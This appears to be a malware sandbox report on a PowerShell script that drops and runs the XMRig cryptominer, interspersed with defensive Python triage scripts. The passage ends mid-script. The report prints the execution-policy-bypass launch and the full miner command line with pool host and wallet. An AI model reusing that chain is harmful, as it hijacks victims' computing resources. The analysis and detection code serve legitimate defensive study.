memory/4440-85-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-86-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-87-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-88-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-89-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-90-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-91-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-92-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-93-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-94-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-95-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-96-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-97-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-98-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-99-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-100-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-101-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-102-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-103-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-104-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-105-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-106-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-107-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-108-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-109-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-110-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-111-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-112-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-113-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-114-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-115-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-116-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-117-0x00007FF708240000-0x00007FF708E73000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits recorded; Description, Indicator, Process and Target are N/A for every hit of this signature.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/876-0-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_risfljkm.gbs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/876-9-0x000001C3E5450000-0x000001C3E5472000-memory.dmp

memory/876-10-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-11-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-12-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-14-0x000001C3E5580000-0x000001C3E5592000-memory.dmp

memory/876-15-0x000001C3E5430000-0x000001C3E543A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4612-46-0x000002CA3DD60000-0x000002CA3DD80000-memory.dmp

memory/4612-47-0x000002CA3DF00000-0x000002CA3DF20000-memory.dmp

memory/4612-48-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/876-49-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/4612-50-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-52-0x000002CAD2160000-0x000002CAD2180000-memory.dmp

memory/876-51-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

memory/4612-53-0x000002CAD2390000-0x000002CAD23B0000-memory.dmp

memory/876-54-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/4612-55-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-56-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-57-0x000002CAD2160000-0x000002CAD2180000-memory.dmp

memory/4612-58-0x000002CAD2390000-0x000002CAD23B0000-memory.dmp

memory/4612-59-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-60-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-61-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-62-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-63-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-64-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-65-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-66-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-67-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-68-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-69-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-70-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-71-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-72-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-73-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-74-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-75-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-76-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-77-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-78-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-79-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-80-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-81-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-82-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-83-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-84-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-85-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-86-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-87-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-88-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-89-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-90-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-91-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-92-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-93-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-94-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-95-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-96-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-97-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-98-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-99-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-100-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-101-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-102-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-103-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-104-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-105-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-106-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-107-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-108-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-109-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-110-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-111-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-112-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-113-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-114-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-115-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-116-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-117-0x00007FF684460000-0x00007FF685093000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win10-20240404-en

Max time kernel

1788s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits recorded; Description, Indicator, Process and Target are N/A for every hit of this signature.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

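The two command lines above are the whole chain: powershell.exe runs a script out of %TEMP% with the execution policy bypassed, and that script starts the dropped xmrig.exe against rx.unmineable.com over stratum+ssl with an unMineable-style user (COIN:wallet.worker) and the placeholder password x. The following is an added triage example, not part of the sandbox report and not XMRig's own code: it parses the miner's switches (-a/--algo, -o/--url, -u/--user, -p/--pass, with the --opt=value spelling also accepted) and runs a two-pass check over constructed process-creation records built from the two reported command lines. PIDs 2076 and 4176 are read off the memory-dump names in the Files section and assumed to be powershell.exe and xmrig.exe; the parent PID of powershell.exe and the notepad.exe control row are invented for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation records modelled on the Processes section.
# The two command lines are the ones the sandbox reported. PIDs 2076 and 4176
# come from the memory-dump names (memory/2076-*, memory/4176-*) and are
# assumed to be powershell.exe and xmrig.exe; the powershell parent PID and the
# notepad.exe control row are invented for this example.
EVENTS = [
    {"pid": 2076, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"'},
    {"pid": 4176, "ppid": 2076,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
            r'-o stratum+ssl://rx.unmineable.com:443 '
            r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"pid": 3001, "ppid": 1000,
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

# powershell.exe accepts unambiguous prefixes of its parameter names, so the
# full spelling seen here (-ExecutionPolicy) is not the only one worth matching.
PS_BYPASS = re.compile(r"-(?:ExecutionPolicy|Exec|Ex|Ep)\s+bypass\b", re.IGNORECASE)
PS_TEMP_SCRIPT = re.compile(r'-File\s+"?[^"]*\\AppData\\Local\\Temp\\', re.IGNORECASE)
POOL_SCHEMES = {"stratum+tcp", "stratum+ssl", "stratum+tls"}
SWITCHES = {"-a": "algo", "--algo": "algo", "-o": "pool", "--url": "pool",
            "-u": "user", "--user": "user", "-p": "password", "--pass": "password"}


def parse_miner_args(cmd):
    """Extract the pool-related switches from an XMRig-style command line.
    Returns None when no pool URL (-o / --url) is present."""
    tokens = []
    for tok in re.findall(r'"[^"]*"|\S+', cmd):      # keep quoted paths whole
        if tok.startswith("--") and "=" in tok:        # --url=host:port spelling
            tokens.extend(tok.split("=", 1))
        else:
            tokens.append(tok)
    args = {}
    for i in range(len(tokens) - 1):
        if tokens[i] in SWITCHES:
            args[SWITCHES[tokens[i]]] = tokens[i + 1].strip('"')
    if "pool" not in args:
        return None
    pool = args["pool"]
    if "://" not in pool:            # bare host:port; treated here as plain TCP
        pool = "stratum+tcp://" + pool
    url = urlsplit(pool)
    # unMineable users look like COIN:wallet.worker; most pools use wallet.worker.
    user = args.get("user", "")
    coin, sep, rest = user.partition(":")
    if not sep:
        coin, rest = None, user
    wallet, _, worker = rest.partition(".")
    return {"algo": args.get("algo"), "scheme": url.scheme, "host": url.hostname,
            "port": url.port, "tls": url.scheme.endswith(("ssl", "tls")),
            "coin": coin, "wallet": wallet, "worker": worker or None,
            "password": args.get("password")}


def triage(events):
    """Flag bypass-policy PowerShell running a %TEMP% script, any process that
    talks stratum to a pool, and a pool-talker whose parent was flagged."""
    findings, flagged_ps = [], set()
    for ev in events:                                   # pass 1: interpreters
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if exe == "powershell.exe" and PS_BYPASS.search(ev["cmd"]) \
                and PS_TEMP_SCRIPT.search(ev["cmd"]):
            flagged_ps.add(ev["pid"])
            findings.append({"pid": ev["pid"], "kind": "powershell_bypass_temp_script"})
    for ev in events:                                   # pass 2: miners
        miner = parse_miner_args(ev["cmd"])
        if miner and miner["scheme"] in POOL_SCHEMES:
            findings.append({"pid": ev["pid"], "kind": "miner_pool_connect", **miner})
            if ev["ppid"] in flagged_ps:
                findings.append({"pid": ev["pid"],
                                 "kind": "miner_spawned_by_flagged_powershell"})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["pid"], f["kind"], f.get("host", ""), f.get("worker", ""))
```

The scheme and lineage are the signal here, not the port: stratum+ssl on 443 means the pool session looks like ordinary HTTPS on the wire, and XMRig also accepts a bare host:port, so a detection keyed only on "connects to 3333" would miss this run.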
Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
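
Read in order, the rows show the staging and the mining endpoint: a lookup of github.com followed by a TCP session to it on 443, the same for objects.githubusercontent.com (the host GitHub serves release assets from, consistent with the xmrig-6.21.3 directory name of the dropped binary), then rx.unmineable.com on 443. The in-addr.arpa rows are reverse (PTR) lookups; reading the octets backwards shows that three of them name exactly the addresses just contacted, while the rest belong to addresses that never appear as a destination in this table. The script below is an added example, not from the report: it parses these flattened rows (embedded as constructed input copied from the table above) and separates direct connections, PTR lookups that merely name a contacted address, PTR lookups for uncontacted addresses, and forward lookups that never led to a connection.

```python
import re

# Constructed input: the Network rows of this analysis, copied as flattened
# "Country Destination Domain Proto" lines. Elsewhere on this page a row can
# lack the Domain column (a bare IP connection), so the parser tolerates that.
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
"""

PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa$",
                    re.IGNORECASE)


def parse_rows(text):
    """Turn the flattened table into dicts. IPv4 only: the ip:port split uses
    the last colon, which would mangle an IPv6 literal."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:              # Domain column empty
            parts.insert(2, None)
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def ptr_to_ip(name):
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215'; None if not a PTR name."""
    m = PTR_RE.match(name or "")
    return ".".join(reversed(m.groups())) if m else None


def correlate(rows):
    """Split the table into direct connections (what the sample actually talked
    to), PTR lookups that name one of those addresses, PTR lookups for
    addresses never contacted, and forward lookups never followed by a session."""
    conns = [r for r in rows if r["port"] != 53]
    ip_to_domain = {r["ip"]: r["domain"] for r in conns}
    ptr_matched, ptr_unmatched, forward = {}, set(), set()
    for r in rows:
        if r["port"] != 53:
            continue
        ip = ptr_to_ip(r["domain"])
        if ip is None:
            forward.add(r["domain"])
        elif ip in ip_to_domain:
            ptr_matched[ip] = ip_to_domain[ip]
        else:
            ptr_unmatched.add(ip)
    forward_only = forward - {d for d in ip_to_domain.values() if d}
    return {"connections": [(r["ip"], r["port"], r["domain"], r["proto"]) for r in conns],
            "ptr_matched": ptr_matched,
            "ptr_unmatched": sorted(ptr_unmatched),
            "forward_only": sorted(forward_only)}


if __name__ == "__main__":
    result = correlate(parse_rows(NETWORK_ROWS))
    for conn in result["connections"]:
        print("connection", *conn)
    for ip, dom in result["ptr_matched"].items():
        print("ptr names contacted host", ip, dom)
    for ip in result["ptr_unmatched"]:
        print("ptr for uncontacted address", ip)
```

When turning this table into indicators, take the direct connections and their forward names; the PTR rows add nothing, and the unmatched ones are not evidence of further infrastructure, since no row shows a session to those addresses.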

Files

memory/2076-3-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/2076-5-0x000001B16C780000-0x000001B16C7A2000-memory.dmp

memory/2076-8-0x000001B16D0A0000-0x000001B16D116000-memory.dmp

memory/2076-9-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxlrhyef.idd.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2076-22-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-25-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-48-0x000001B16CD20000-0x000001B16CD32000-memory.dmp

memory/2076-61-0x000001B16C850000-0x000001B16C85A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4176-90-0x000002A9E7240000-0x000002A9E7260000-memory.dmp

memory/2076-91-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-92-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/2076-94-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/4176-93-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-95-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-96-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-97-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-98-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-99-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-100-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-101-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-102-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-103-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-104-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-105-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-106-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-107-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-108-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-109-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-110-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-111-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-112-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-113-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-114-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-115-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-116-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-117-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-118-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-119-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-120-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-121-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-122-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-123-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-124-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-125-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-126-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-127-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-128-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-129-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-130-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-131-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-132-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-133-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-134-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-135-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-136-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-137-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-138-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-139-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-140-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-141-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-142-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-143-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-144-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-145-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-146-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-147-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-148-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-149-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-150-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-151-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-152-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-153-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-154-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-155-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-156-0x00007FF718200000-0x00007FF718E33000-memory.dmp
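
Two files with digests are listed. As an added check, not part of the report: the __PSScriptPolicyTest_*.ps1 digests are those of the single byte 1, which is what powershell.exe writes into a throwaway .ps1 under %TEMP% at startup to test whether AppLocker/WDAC script enforcement applies to it, so that entry is a side effect of launching PowerShell rather than something the script dropped. The xmrig.exe digests are the sample's own payload and are identical in each run shown on this page. The code below derives the probe digests from b"1" and classifies a constructed file list copied from the Files sections of this page; the third entry is the policy-test variant seen in the win10v2004 runs, whose content the report does not give, so it is reported as unverified rather than asserted benign.

```python
import hashlib

# Constructed records: entries copied from the Files sections of this page
# (the first two from this run, the third from a win10v2004 run of the sample).
FILES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxlrhyef.idd.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
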